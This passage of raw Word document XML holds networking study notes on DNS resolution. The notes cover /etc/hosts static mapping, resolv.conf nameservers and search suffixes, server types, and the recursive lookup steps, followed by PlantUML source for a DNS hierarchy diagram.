        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F4931" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t xml:space="preserve">But </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not exist </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t>, so it have to query DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7C986" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00B86A44" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:t xml:space="preserve">checks </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>/etc/resolv.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:t xml:space="preserve"> to see which DNS servers to ask</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692AE2BC" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nameserver 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4923F5" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nameserver 1.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F549CA" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>search example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021CB7C8" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00B86A44" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t>Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C32EA0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00B86A44" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>8.8.8.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>1.1.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t>are public DNS servers — Google and Cloudflare, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E08818" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t>uffi</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t xml:space="preserve"> appended to short hostnames (for example, </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1.example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86A44">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1D4A4" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D75BD7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00B86A44" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On many modern systems (especially those using </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>NetworkManager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>systemd-resolved</w:t>
      </w:r>
      <w:r>
        <w:t>), this file is automatically generated. Manual edits may be overwritten unless you disable the manager or configure it properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EB0CCB" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t xml:space="preserve">Now if </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is added to</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54567860" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1454D04C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="006B5005" w:rsidRDefault="00A60755" w:rsidP="00A60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6B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>server1.example.com server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7B540" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t xml:space="preserve">This is called </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>static mapping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and it guarantees </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1.example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">resolves to </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5005">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> immediately regardless of DNS. So in the next try to ping to </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>server1</w:t>
      </w:r>
      <w:r>
        <w:t>, the DNS Client in your system no longer have to query any DNS Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C811039" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E58287C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715E55A" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r w:rsidRPr="00827649">
        <w:t xml:space="preserve">The DNS </w:t>
      </w:r>
      <w:r>
        <w:t>Server is a system that responds to DNS queries. It can be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C9266" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authoritative — stores and serves DNS records for domains it manages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535931B0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00827649" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recursive — resolves queries on behalf of clients by walking the DNS hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD41697" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00456114">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267356AE" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r w:rsidRPr="00456114">
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t xml:space="preserve"> operates through a distributed hierarchy of name servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1110D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query initiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: User types domain name in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C87F045" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Local resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: Operating system checks local DNS cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46196B05" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursive query</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: DNS resolver queries configured DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582B847E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root server query</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: Recursive server queries root name servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1886C246" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLD server query</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: Root servers direct to Top-Level Domain servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D7AB82" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authoritative query</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: TLD servers direct to authoritative name servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB56EB" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response return</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: Authoritative server provides IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A25427" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9535E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>: Result cached at multiple levels for futur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8"/>
        <w:gridCol w:w="1278"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A60755" w14:paraId="5D6773B1" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16218" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438353C1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03EEEA22" wp14:editId="7F98C0C9">
                  <wp:extent cx="8023916" cy="7163490"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="108875312"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6549" cy="7174768"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1278" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2030E90F" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F69A50A" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title DNS Server Hierarchical Structure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62ED3A23" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41DC31D2" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "DNS Server Hierarchy" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37702EB7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Root (.)" as root #lightgray {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BCEBC2" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Root Servers\n13 global clusters" as root_servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BAD640B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E3C96B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EB2FC63" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Top-Level Domains" as tlds #lightblue {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63895F18" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle ".com\nCommercial" as com_tld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="281202BF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle ".org\nOrganizations" as org_tld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="560029DC" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle ".net\nNetwork" as net_tld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F52B9E8" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
